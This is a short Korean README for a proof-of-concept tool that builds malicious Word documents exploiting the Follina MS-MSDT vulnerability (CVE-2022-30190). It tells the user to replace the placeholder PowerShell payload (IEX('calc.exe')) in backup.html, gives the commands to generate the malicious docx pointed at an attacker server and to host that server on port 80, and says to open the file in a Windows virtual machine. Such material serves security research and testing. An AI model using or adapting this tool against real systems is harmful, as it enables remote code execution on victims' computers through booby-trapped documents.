
MS-MSDT Follina CVE-2022-30190 PoC 문서 생성기
(Microsoft Office Word 원격 코드 실행) 취약점을 악용하는 악성 docx 생성기
이 스크립트는 LockedByte의 CVE-2021-40444 PoC와 Tothi의 writeup을 기반으로 제작되었습니다.
먼저 backup.html을 수정하고 powershell 페이로드를 교체하세요. 현재는 IEX('calc.exe')를 사용하여 calc.exe만 실행합니다.
python3 exploit.py generate http://<SRV IP>

악성 docx를 생성하면(out/에 생성됨) 서버를 설정할 수 있습니다:
sudo python3 exploit.py host 80

마지막으로 Windows 가상 머신에서 docx를 실행해 보세요:
